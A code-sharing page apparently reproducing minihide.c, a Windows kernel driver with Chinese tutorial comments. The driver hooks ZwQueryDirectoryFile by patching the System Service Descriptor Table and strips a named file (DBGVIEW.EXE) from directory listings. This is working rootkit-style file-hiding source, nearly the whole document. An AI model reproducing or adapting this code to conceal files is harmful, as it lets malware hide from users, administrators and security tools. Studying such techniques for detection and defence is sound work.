?? minihide.c
字號:
#include <wdm.h>
// http://manbu.net/Lib/Class9/Sub1/56/22.asp
// http://sg.kehui.net/index.php/article/read/1/19809
// http://blog.donews.com/zwell/archive/2005/01/10/232227.aspx
// http://dev.csdn.net/article/21/21216.shtm
// http://www.vchelp.net/itbookreview/view_paper.asp?paper_id=920
// http://www.allife.org/index.php?job=art&articleid=a_20060117_133527
typedef unsigned int UINT;
typedef char * PCHAR;
typedef unsigned long BOOL;
typedef unsigned long DWORD;
#define FileBothDirectoryInformation 3
typedef struct _FILE_BOTH_DIR_INFORMATION {
ULONG NextEntryOffset;
ULONG FileIndex;
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER EndOfFile;
LARGE_INTEGER AllocationSize;
ULONG FileAttributes;
ULONG FileNameLength;
ULONG EaSize;
CCHAR ShortNameLength;
WCHAR ShortName[12];
WCHAR FileName[1];
} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;
VOID RtlUpperString(IN OUT PSTRING DestinationString, IN PSTRING SourceString);
extern NTSYSAPI NTSTATUS NTAPI
ZwQueryDirectoryFile(IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,
IN ULONG FileInformationBufferLength,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN bReturnOnlyOneEntry,
IN PUNICODE_STRING PathMask OPTIONAL,
IN BOOLEAN bRestartQuery);
typedef NTSTATUS (* REALZWQUERYDIRECTORYFILE)(IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,
IN ULONG FileInformationBufferLength,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN bReturnOnlyOneEntry,
IN PUNICODE_STRING PathMask OPTIONAL,
IN BOOLEAN bRestartQuery);
// 定義一個原函數指針
REALZWQUERYDIRECTORYFILE RealZwQueryDirectoryFile;
// 3. 定義替換 API 函數的原型:
//
NTSTATUS HookZwQueryDirectoryFile(
IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,
IN ULONG FileInformationBufferLength,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN bReturnOnlyOneEntry,
IN PUNICODE_STRING PathMask OPTIONAL,
IN BOOLEAN bRestartQuery);
// -=描述 SYSTEMSERVICE 的定義=-
typedef struct ServiceDescriptorEntry {
unsigned int * ServiceTableBase; // 關鍵字段, 指向系統(tǒng)服務分發(fā)例程的基地址
unsigned int * ServiceCounterTableBase;
unsigned int NumberOfServices;
unsigned char * ParamTableBase;
} ServiceDescriptorTableEntry_t, * PServiceDescriptorTableEntry_t;
__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;
#define SYSTEMSERVICE(_function) KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)]
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath);
void HideFile_Unload(PDRIVER_OBJECT DriverObject);
#pragma alloc_text(INIT, DriverEntry)
#pragma alloc_text(PAGE, HideFile_Unload)
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
NTSTATUS NtStatus = STATUS_SUCCESS;
UINT uiIndex = 0;
PDEVICE_OBJECT pDeviceObject = NULL;
UNICODE_STRING usDriverName, usDosDeviceName;
DbgPrint("DriverEntry Called\r\n");
RtlInitUnicodeString(&usDriverName, L"\\Device\\HideFile");
RtlInitUnicodeString(&usDosDeviceName, L"\\DosDevices\\HideFile");
NtStatus = IoCreateDevice(pDriverObject,
0,
&usDriverName,
FILE_DEVICE_UNKNOWN,
FILE_DEVICE_SECURE_OPEN,
FALSE,
&pDeviceObject);
if (STATUS_SUCCESS == NtStatus) {
pDriverObject->DriverUnload = HideFile_Unload;
}
pDeviceObject->Flags |= DO_DIRECT_IO;
pDeviceObject->Flags &= (~DO_DEVICE_INITIALIZING);
IoCreateSymbolicLink(&usDosDeviceName, &usDriverName);
// 4. 在 DriverEntry(驅動入口)函數中加入如下申明:
// 保存真正的 ZwQueryDirectoryFile 函數地址
RealZwQueryDirectoryFile = (REALZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile));
// 把自定義的替換函數指針指向真正的ZwQueryDirectoryFile函數
(REALZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)) = HookZwQueryDirectoryFile;
return NtStatus;
}
void HideFile_Unload(PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING usDosDeviceName;
// 5.在DriverUnload(驅動卸載函數)函數中加入恢復代碼:
//恢復原來的函數指針
(REALZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)) = RealZwQueryDirectoryFile;
DbgPrint("HideFile_Unload Called\r\n");
RtlInitUnicodeString(&usDosDeviceName, L"\\DosDevices\\HideFile");
IoDeleteSymbolicLink(&usDosDeviceName);
IoDeleteDevice(DriverObject->DeviceObject);
}
// 6. 現在準備工作做好了, 函數指針都已經設置轉向了, 剩下的是實現這個我們自定義的
// 替換函數 HookZwQueryDirectoryFile, 代碼如下:
//
NTSTATUS HookZwQueryDirectoryFile(IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,
IN ULONG FileInformationBufferLength,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN bReturnOnlyOneEntry,
IN PUNICODE_STRING PathMask OPTIONAL,
IN BOOLEAN bRestartQuery)
{
NTSTATUS rc;
ANSI_STRING ansiHideDirFile;
// 初始化要過濾的文件名這里是 debug.exe
// 這里字符串是常量, 不用釋放
RtlInitAnsiString(&ansiHideDirFile, "DBGVIEW.EXE");
// 執(zhí)行真正的 ZwQueryDirectoryFile 函數
rc = ((REALZWQUERYDIRECTORYFILE)(RealZwQueryDirectoryFile))(
hFile,
hEvent,
IoApcRoutine,
IoApcContext,
pIoStatusBlock,
FileInformationBuffer,
FileInformationBufferLength,
FileInfoClass,
bReturnOnlyOneEntry,
PathMask,
bRestartQuery);
// 如果執(zhí)行成功, 而且 FILE_INFORMATION_CLASS 的值為 FileBothDirectoryInformation, 我們就進行處理, 過濾
if(NT_SUCCESS(rc) && (FileInfoClass == FileBothDirectoryInformation))
{
UNICODE_STRING uniFileName;
PFILE_BOTH_DIR_INFORMATION pFileInfo;
PFILE_BOTH_DIR_INFORMATION pLastFileInfo;
BOOL bLastOne=FALSE;
// 把執(zhí)行結果賦給 pFileInfo
pFileInfo = (PFILE_BOTH_DIR_INFORMATION)FileInformationBuffer;
pLastFileInfo = NULL;
// 循環(huán)檢查
do {
ANSI_STRING ansiDesFileName, ansiSrcFileName;
bLastOne = (0 == pFileInfo->NextEntryOffset);
RtlInitUnicodeString(&uniFileName, pFileInfo->FileName); // uniFileName 不用釋放
RtlUnicodeStringToAnsiString(&ansiDesFileName, &uniFileName, TRUE); // TRUE, 必須釋放
RtlUnicodeStringToAnsiString(&ansiSrcFileName, &uniFileName, TRUE);
RtlUpperString(&ansiDesFileName, &ansiSrcFileName);
// 打印結果, 用 debugview 可以查看打印結果
DbgPrint("ansiFileName :%s\n", ansiDesFileName.Buffer);
DbgPrint("HideDirFile :%s\n", ansiHideDirFile.Buffer);
// 開始進行比較, 如果找到了就隱藏這個文件或者目錄
if( RtlCompareMemory(ansiDesFileName.Buffer, ansiHideDirFile.Buffer, ansiHideDirFile.Length) == ansiHideDirFile.Length)
{
DbgPrint("This is HideDirFile!\n");
if(bLastOne)
{
if(pFileInfo == (PFILE_BOTH_DIR_INFORMATION)FileInformationBuffer )
{
rc = 0x80000006; // 隱藏文件或者目錄;
}
else
{
pLastFileInfo->NextEntryOffset = 0;
}
RtlFreeAnsiString(&ansiSrcFileName); //===========================
RtlFreeAnsiString(&ansiDesFileName); //===========================
break;
}
else //指針往后移動
{
int iPos = ((ULONG)pFileInfo) - (ULONG)FileInformationBuffer;
int iLeft = (DWORD)FileInformationBufferLength - iPos - pFileInfo->NextEntryOffset;
RtlCopyMemory( (PVOID)pFileInfo,
(PVOID)( (char *)pFileInfo + pFileInfo->NextEntryOffset ),
(DWORD)iLeft );
RtlFreeAnsiString(&ansiSrcFileName); //===========================
RtlFreeAnsiString(&ansiDesFileName); //===========================
continue;
}
}
pLastFileInfo = pFileInfo;
pFileInfo = (PFILE_BOTH_DIR_INFORMATION)
((char *)pFileInfo + pFileInfo->NextEntryOffset);
RtlFreeAnsiString(&ansiSrcFileName); //===========================
RtlFreeAnsiString(&ansiDesFileName); //===========================
} while ( FALSE == bLastOne );
}
return(rc);
}
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -